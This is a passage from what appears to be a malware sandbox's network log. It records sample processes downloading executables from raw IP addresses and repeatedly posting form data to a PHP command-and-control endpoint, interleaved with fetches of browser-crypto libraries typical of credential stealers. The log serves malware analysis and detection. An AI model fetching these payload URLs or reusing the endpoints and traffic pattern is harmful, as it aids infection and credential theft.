                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:05 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://185.172.128.59/syncUpd.exe
                                                                                                                                                                                                                                                                  dH6oPXkyyyDL7hNf3xeAvCZ9.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.59:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /syncUpd.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 185.172.128.59
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:05 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Last-Modified: Sat, 11 May 2024 22:30:01 GMT
                                                                                                                                                                                                                                                                  ETag: "3d400-618353166eba2"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Content-Length: 250880
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://185.172.128.228/BroomSetup.exe
                                                                                                                                                                                                                                                                  dH6oPXkyyyDL7hNf3xeAvCZ9.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.228:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /BroomSetup.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 185.172.128.228
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:06 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT
                                                                                                                                                                                                                                                                  ETag: "4a4030-613b1bf118700"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Content-Length: 4866096
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
                                                                                                                                                                                                                                                                  u2rs.1.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  20.157.87.45:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /__svc/sbv/DownloadManager.ashx HTTP/1.0
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 300
                                                                                                                                                                                                                                                                  Host: svc.iolo.com
                                                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/3.0 (compatible; Indy Library)
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  cache-control: private
                                                                                                                                                                                                                                                                  content-length: 256
                                                                                                                                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  x-whom: Ioloweb5
                                                                                                                                                                                                                                                                  date: Sat, 11 May 2024 22:40:08 GMT
                                                                                                                                                                                                                                                                  set-cookie: SERVERID=svc5; path=/
                                                                                                                                                                                                                                                                  connection: close
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://185.172.128.150/c698e1bc8a2f5e6d.php
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c698e1bc8a2f5e6d.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----DGCGDBGCAAEBFIECGHDG
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Content-Length: 217
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:11 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Content-Length: 156
                                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://185.172.128.150/c698e1bc8a2f5e6d.php
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c698e1bc8a2f5e6d.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----IEHCBAFIDAECBGCBFHJE
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Content-Length: 268
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:11 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Content-Length: 1520
                                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://185.172.128.150/c698e1bc8a2f5e6d.php
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c698e1bc8a2f5e6d.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----BKFBAECBAEGDGDHIEHIJ
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Content-Length: 267
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:11 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Content-Length: 5416
                                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://185.172.128.150/c698e1bc8a2f5e6d.php
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c698e1bc8a2f5e6d.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----FIDGDAKFHIEHJKFHDHDB
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Content-Length: 5295
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:11 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://185.172.128.150/b7d0cfdb1d966bdd/sqlite3.dll
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /b7d0cfdb1d966bdd/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:11 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
                                                                                                                                                                                                                                                                  ETag: "10e436-5e7eeebed8d80"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Content-Length: 1106998
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://185.172.128.150/c698e1bc8a2f5e6d.php
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c698e1bc8a2f5e6d.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----GHJEHJJDAAAKEBGCFCAA
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Content-Length: 359
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:11 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=95
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://185.172.128.150/c698e1bc8a2f5e6d.php
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c698e1bc8a2f5e6d.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----FIEHIIIJDAAAAAAKECBF
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Content-Length: 359
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:12 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=94
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://185.172.128.150/b7d0cfdb1d966bdd/freebl3.dll
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /b7d0cfdb1d966bdd/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:12 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                                                  ETag: "a7550-5e7ebd4425100"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Content-Length: 685392
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://185.172.128.150/b7d0cfdb1d966bdd/mozglue.dll
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /b7d0cfdb1d966bdd/mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:12 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                                                  ETag: "94750-5e7ebd4425100"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Content-Length: 608080
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://185.172.128.150/b7d0cfdb1d966bdd/msvcp140.dll
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /b7d0cfdb1d966bdd/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:13 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                                                  ETag: "6dde8-5e7ebd4425100"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Content-Length: 450024
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://185.172.128.150/b7d0cfdb1d966bdd/nss3.dll
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /b7d0cfdb1d966bdd/nss3.dll HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:13 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                                                  ETag: "1f3950-5e7ebd4425100"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Content-Length: 2046288
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://185.172.128.150/b7d0cfdb1d966bdd/softokn3.dll
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /b7d0cfdb1d966bdd/softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:14 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                                                  ETag: "3ef50-5e7ebd4425100"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Content-Length: 257872
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://185.172.128.150/b7d0cfdb1d966bdd/vcruntime140.dll
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /b7d0cfdb1d966bdd/vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:14 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                                                  ETag: "13bf0-5e7ebd4425100"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Content-Length: 80880
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://185.172.128.150/c698e1bc8a2f5e6d.php
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c698e1bc8a2f5e6d.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----IJDBKKJKJEBFBGCBAAFI
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Content-Length: 947
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:14 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=87
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://185.172.128.150/c698e1bc8a2f5e6d.php
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c698e1bc8a2f5e6d.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----JKKKJJJKJKFHJJJJECBF
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Content-Length: 267
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:14 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Content-Length: 2408
                                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=86
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://185.172.128.150/c698e1bc8a2f5e6d.php
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c698e1bc8a2f5e6d.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----IDHIEGIIIECAKEBFBAAE
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Content-Length: 265
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:14 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Content-Length: 2052
                                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=85
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://185.172.128.150/c698e1bc8a2f5e6d.php
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c698e1bc8a2f5e6d.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----FHDAEHDAKECGCAKFCFIJ
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Content-Length: 647443
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:15 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=84
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://185.172.128.150/c698e1bc8a2f5e6d.php
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c698e1bc8a2f5e6d.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----CAFBGDHCBAEHIDGCGIDA
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Content-Length: 15735
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:21 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=83
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://185.172.128.150/c698e1bc8a2f5e6d.php
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c698e1bc8a2f5e6d.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----FIIIIJKFCAAECAKFIEHC
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Content-Length: 15731
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:21 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=82
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://185.172.128.150/c698e1bc8a2f5e6d.php
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c698e1bc8a2f5e6d.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----JKJKJJDBKEGIECAAECFH
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Content-Length: 77111
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
